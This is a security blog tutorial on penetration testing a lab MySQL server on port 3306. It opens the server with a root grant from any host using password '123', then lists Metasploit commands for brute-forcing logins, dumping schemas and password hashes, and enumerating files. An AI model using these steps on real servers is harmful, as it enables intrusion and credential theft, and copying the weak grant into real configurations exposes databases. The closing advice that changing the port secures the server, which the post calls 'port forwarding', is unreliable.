Subscribe to Blog via Email

Categories

Archives

Database Hacking, Penetration Testing

Penetration Testing on MYSQL (Port 3306)

In this article, we will learn to make MySQL port vulnerable and then secure it for the penetration testing on the port 3306. In order to completely learn and understand how to secure service on a port, you have to understand how to make it vulnerable and then perform penetration testing. Because if you don’t understand what can be exploited and how then you will always fail to secure it.

Table of Content

  • Introduction to MySQL-Server
  • Installation of MySQL-Server
  • Pen testing MySQL-Server

Introduction to MySQL-Server

The base of MySQL will be MySQL server, which handles the majority of the database guidelines (or directions). MySQL server is accessible as a different program for use in a customer server organized condition and as a library that can be implanted (or connected) into separate applications. MySQL works alongside a few utility projects which bolster the organization of MySQL databases. Directions are sent to MySQL-Server by means of the MySQL customer, which is introduced on a PC. It runs port 3306 by default.

Installation of MySQL-server

The first thing to do is to install MySQL server and to do so use the following command :

apt install mysql-server

Further, use the following command to check whether the server is up and running or not.

netstat -tnl

Pentesting MySQL-Server

Scanning Mysql & Connecting to Mysql

Now, as you can see the MySQL server is properly working. But if you will scan the port, it will show you that it’s closed.

nmap -p3306 192.168.1.108

This port is closed because as it is running on the local address when scanned with any other IP then it will show you that the port is closed when this is not the case. This happens because of the default setting in the configuration’s files of MySQL, the bind address is 127.0.0.1 i.e. the port will be shown open only if you scan from this IP just like shown in the image below. And to make this change open the configuration file using the following command:

nano /etc/mysql/mysql.conf.d/mysqld.cnf

To change this setting, just add ‘#’ in front of the ‘bind-address’ as shown in the image below :

Now if you scan it, it will show you that the port is open.

nmap -p3306 192.168.1.108

But further if you try to login through this port, it will give you an error. This happens because the MySQL server does not grant privileges to other IP’s to do their bidding.

This error can be removed when you login into the MySQL server and run the following commands which will grant all permission to the root user at when login from different IP :

GRANT ALL PRIVILEGES ON *.* TO [email protected]'%' IDENTIFIED BY '123';
FLUSH PRIVILEGES;

Now, when you try and login, you will be successful as shown in the image below:

Let’s scan the port again to grab as many details as we can such as its banner. Mac address, etc.

nmap -sv -p3306 192.168.1.108

Mysql Brute-Force Attack

One can also brute force the port by using Metasploit. This module simply queries the MySQL instance for a specific user/pass for this, go to the terminal in kali and type ‘msfconsole’ and then use the following commands to commence the brute force login:

use auxiliary/scanner/mysql/mysql_login
set rhosts 192.168.1.108
set user_file /root/Desktop/user.txt
set pass_file /root/Desktop/pass.txt
exploit

Running SQL queries without Login into Mysql

This module allows for simple SQL statements to be executed against a MySQL instance given the appropriate credentials. For this, type :

use auxiliary/admin/mysql/mysql_sql
set rhosts 192.162.1.108
set username root
set password 123
set sql show databases
exploit

Extract Mysql-Schemadump Information

Our next module extracts the schema information from a MySQL DB server. For this exploit, type :

use auxiliary/scanner/mysql/mysql_schemadump
set rhosts 192.168.1.108
set username root
set password 123
exploit

Extracting Login from Mysql-server

And to extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking; use the following exploit :

use auxiliary/scanner/mysql/mysql_hashdump
set rhosts 192.168.1.108
set username root
set password 123
exploit

Once the above module is completed, you see it result in the file it creates as shown in the image below:

Checking Writable Directories

Another attack that can be executed on Mysql port is to check the directories that are writable. But by default, this attack cannot be performed. So, admin, the has done following the configuration then an attacker can check for directories that are writable.

nano /etc/mysql/mysql.conf.d/mysqld.cnf

Then add at the end of the file.

secure_file_priv=""

Now if you run the following exploit through Metasploit, it will allow you to Enumerate writeable directories using the MySQL SELECT INTO DUMPFILE feature.

use auxiliary/scanner/mysql/mysql_writable_dirs
set rhosts 192.168.1.108
set username root
set password 123
set dir_list /root/dir.txt
exploit

Enumerating File

For further pentesting MySQL port, you can use the following exploit for Enumerate files and directories using the MySQL load_file feature.

use auxiliary/scanner/mysql/mysql_file_enum
set rhosts 192.168.1.108
set username root
set password 123
set file_list /root/dir.txt
exploit

Port Transferring

Next comes port forwarding. This method is used in order to secure the port from the attacks. For port forwarding, just open the configuration by using the following command:

nano etc/mysql/mysql.conf.d/mysqld.cnf

And then change the port number to whichever you desire. For instance, we have given here in 4033.

After changing the port, when you scan it, it will show you the SQL service is running on the new port instead of the default one.

So, this way to learn how to exploit and secure MySQL-Server.

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

7 thoughts on “Penetration Testing on MYSQL (Port 3306)

  1. Hi, Raj.

    I can’t leave my password blank.
    I pressed ENTER, and no response.
    Can you help me, please?
    Thank you.

    1. Andriel,

      I think you should not give “-p” in the mysql command if there’s no password. So your command should be: mysql -h hostname -u username

  2. I have tried the mysql brute force attack with the correct RHOSTS, USER_file and PASS_file but when I run it metasploit says: unsupported version of mysql detected. skipping.
    Now what?

    1. You will have to specify the target with `set target [target id]`, You can see the available targets by `show targets`. If you are brute-forcing passwords of the MySQL server, using hydra is much quicker.

Leave a Reply

Your email address will not be published. Required fields are marked *